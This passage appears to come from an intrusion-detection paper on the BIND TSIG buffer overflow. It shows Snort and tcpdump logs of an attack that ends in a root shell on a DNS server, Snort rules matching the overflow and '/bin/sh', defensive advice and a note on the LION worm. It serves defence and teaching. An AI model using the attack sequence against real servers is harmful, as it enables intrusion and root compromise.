6C 6F 63 61 6C 0A 6E 61 6D 65 64 5F 64 75 6D 70 local.named_dump
2E 64 62 0A .db.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:21.864093 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x42
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6768 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x657DB35 Ack: 0x71CE0F1 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 937183 275287865
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:22.994188 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x42
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6770 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x657DB35 Ack: 0x71CE0F1 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 937296 275287865
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:22.995025 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x42
VICTOM:36864 -> ATTACKER:1032 TCP TTL:64 TOS:0x0 ID:61861 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x71CE0F1 Ack: 0x657DB36 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 275287980 937296
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:22.996131 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x42
VICTOM:36864 -> ATTACKER:1032 TCP TTL:64 TOS:0x0 ID:61862 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x71CE0F1 Ack: 0x657DB36 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 275287980 937296
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:22.996233 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x42
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6772 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x657DB36 Ack: 0x71CE0F2 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 937296 275287980
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

The following output is from tcpdump (using ./tcpdump ) and was also running when the attack took place (It has been shortened for brevity):

15:33:19.465555 ATTACKER.1024 > VICTOM.domain: 48879 inv_q+ [b2&3=0x980] (476)
15:33:19.469874 VICTOM.domain > ATTACKER.1024: 48879 inv_q FormErr [0q][|domain]
15:33:19.472301 ATTACKER.1024 > VICTOM.domain: 57005+ [b2&3=0x180] [7q] [1au][|domain]
15:33:19.476199 VICTOM.domain > ATTACKER.1024: 57005 [7q][|domain]
15:33:19.476302 ATTACKER > VICTOM: icmp: ATTACKER udp port 1024 unreachable [tos 0xc0]
15:33:19.494214 ATTACKER.1032 > VICTOM.36864: S 106421026:106421026(0) win 32120
<mss 1460,sackOK,timestamp 936946[|tcp]> (DF)
15:33:19.495108 VICTOM.36864 > ATTACKER.1032: S 119332722:119332722(0)
ack 106421027 win 32120 <mss 1460,sackOK,timestamp 275287630[|tcp]> (DF)
15:33:19.495220 ATTACKER.1032 > VICTOM.36864: . ack 1 win 32120
<nop,nop,timestamp 936946 275287630> (DF)

The first two packets in both the snort and tcpdump output represent the initial IQUERY request and response. Tcpdump does an excellent job of capturing this traffic by decoding some of the application layer. We can see that the attacker sends the inverse query in the first packet, denoted by the "inv_q+". The second packet shows the victim responding with an error, denoted by the "inv_q FormErr". The first packet in this exchange triggers the following snort rule:

alert udp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"IDS277 - NAMED Iquery Probe"; content:
"|0980 0000 0001 0000 0000|"; offset: 2; depth: 16;)

The above rule is included in the standard ruleset from www.snort.org and will generate an alert each time an inverse query is performed. The next udp packet is the bogus TSIG record that is sent from the attacker to the victim. The victim receives the TSIG record without the proper secure key so the victim sends back an error. The attacker now knows that the exploit has already been launched so the source port (1024) is closed. The victim is not aware of this, sending the error message to that port anyway, which in turn generates the ICMP Port Unreachable packet. Right after the port Unreachable message is when the TCP connection begins to the victim system. This can occur because the malicious shellcode that was just sent to the victim host has executed and is listening on that port with the shellcode, running as root. Now we have a "root shell" and can begin to execute commands on the remote host.

Further Detection & Defensive Recommendation

We really need to be able to detect (and log if possible) two things, the UDP packet containing the TSIG overflow (and shellcode), as well as the TCP connection that is made if the attack is successful. We want to know if someone is trying to compromise of our machines, and if a TCP connection is made we can be almost positive that the machine has been compromised. The following snort rule takes care of these conditions:

activate udp any -> any 53 (msg:"Bind TSIG Overflow Attempt"; content: "|80 00 07 00 00
00 00 00 01 3F 00 01 02|/bin/sh"; tag: host, 300, seconds, src;)

The above rule will generate an alert when a UDP packet comes from any host on any port, whose destination is any host on port 53, and matches the signature in the content field. The message in the alert file will tell us that this is a Bind TSIG overflow attempt. The first part of the content field is the hex signature for a TSIG packet, and the second field tells snort to look for the string "/bin/sh". The last field is a brand new addition to the Snort Intrusion Detection System. This rule is "tagged" to grab all of the traffic to and from the current host being attacked for the time specified (in this case 300 seconds). This provides us with the ability to detect this type of attack and grab every piece of data to and from victim and attacker, including every keystroke that the attacker presses. This allows us to see exactly what happened without alerting the attacker to our presence like many host based IDS systems that require files and such to be on your machines. We also do not have to login to the victim host and poke around to see what happened, which destroys valuable evidence. The alert file (or wherever you send your snort alerts to) will look like this:

[**] IDS277 - NAMED Iquery/Infoleak Probe [**]
03/04-10:53:05.742125 192.168.0.10:1291 -> 192.168.0.4:53
UDP TTL:64 TOS:0x0 ID:36981 IpLen:20 DgmLen:504
Len: 484

[**] Bind TSIG Overflow Attempt [**]
03/04-12:42:07.223768 192.168.0.10:1294 -> 192.168.0.4:53
UDP TTL:64 TOS:0x0 ID:38323 IpLen:20 DgmLen:538
Len: 518

The log for 192.168.0.4 will contain all the traffic between the two hosts in the exact same format as above when we were logging all traffic on the network.

Adding the above rules to your snort IDS and monitoring it closely will provide you with the necessary tools to successfully detect this attack. You should also put your DNS servers behind the firewall and block all other ports besides 53/udp (and maybe 53/tcp with a filter to prevent zone transfers and TCP port scanning). This will prevent attackers from being able to start a rootshell on higher ports numbers, such as 36864 as shown in the example above. You should also add Egress filtering to your router and/or firewall to prevent your DNS from sending out information it does not have to (i.e. mail, FTP, telnet, etc.). This way even if the attack is successful the hacker cannot launch attacks onto other machines, or at least is limited as to what they can do. The host, especially a high profile machine like your DNS server, should have some sort of host based intrusion detection (such as Portsentry http://www.psionic.com and/or Fcheck http://www.geocities.com/fcheck2000). Portsentry will log every connection attempt to each port that you tell it to, and Fcheck performs checksum operations on your binaries (or any other type of file) and alerts you of changes. Finally, always be sure that you are on the most current release of Bind, which is Bind 9.1.0 (http://www.isc.org/products/BIND/bind9.html) in the Bind 9.x series, Bind 8.2.3-REL (http://www.isc.org/products/BIND/bind8.html) in the Bind 8.x series, and Bind 4.9.8 (http://www.isc.org/products/BIND/bind4.html) in the 4x. series at this time [3].

Update: The LION worm

On March 23, 2001 SANS issued an alert describing the LION worm (http://www.sans.org/y2k/lion.htm). This worm attacks Red Hat Linux systems using the Bind TSIG buffer overflow. The program scans class B networks looking for vulnerable DNS servers. When it finds a vulnerable host it is compromised and the t0rn root kit is installed, as well as multiple backdoors and trojan binaries and logging is disabled. Since this trojan uses the Bind TSIG attack I submitted my rule to intrusion@sans.org and it was posted to the web site (http://www.sans.org/y2k/032601.htm). Even though the worm disables the logging on the target system snort will allow you to see the data travel across the network using the rule above. This new worm heightened the awareness of the Bind TSIG attack, and as a result many new snort rules were written. These rules cover the different strands of the Bind TSIG attack, including lion. From www.whitehats.com here are the current rules:
  • IDS482/named-exploit-tsig-infoleak (CAN-2001-0012)
  • IDS489/named-exploit-tsig-lsd (CAN-2001-0010)
  • IDS490/named-exploit-tsig-lucysoft (CAN-2001-0010)
  • IDS491/named-exploit-tsig-tsig0wn (CAN-2001-0010)
Any one of these rules can be wrapped with the activation features as shown above, and I expect that once snort 1.7.1 is released all rules that are triggered by buffer overflows will use this feature. A document on how to prevent becoming infected with the lion worm can be found here http://www.sans.org/y2k/lion_protection.htm.

Acknowledgments

Special thanks to Martin Roesch for personally helping me utilize the newer (and relatively untested at the time) features of snort to create the detection rule presented in this paper. Snort is one of the best examples of how successful an open source project can be.

References

[1] Aleph One. "Smashing The Stack." Phrack Magazine Volume Seven, Issue Forty-Nine 10-20.

[2] Cohen, Cory F. Cert Coordination Center. "ISC BIND 8 contains buffer overflow in transaction signature (TSIG) handling code". Vulnerability Note VU#196945. URL: http://www.kb.cert.org/vuls/id/196945 (1 Mar. 2001).

[3] Internet Software Consortium. "Bind Vulnerabilities" URL: http://www.isc.org/products/BIND/bind-security.html (15 Feb 2001).

[4] Lanza, Jeffrey P. Cohen, Cory. "CERT� Advisory CA-2001-02 Multiple Vulnerabilities in BIND" CERT/CC. 29 January 2001. URL: http://www.cert.org/advisories/CA-2001-02.html. (22 Feb. 2001).

[5] Mixter. "Writing buffer overflow exploits - a tutorial for beginners" URL: http://members.tripod.com/mixtersecurity/exploit.txt (12 Feb 2001).

[6] Osborne , Anthony. McDonald, John. "Vulnerabilities in BIND 4 and 8". 29 January 2001. URL: http://www.pgp.com/research/covert/advisories/047.asp (10 Feb. 2001)

[7] Roesch, Martin. Advanced Intrusion Detection: Snort Style. The SANS Institute, 2001. 139 - 150.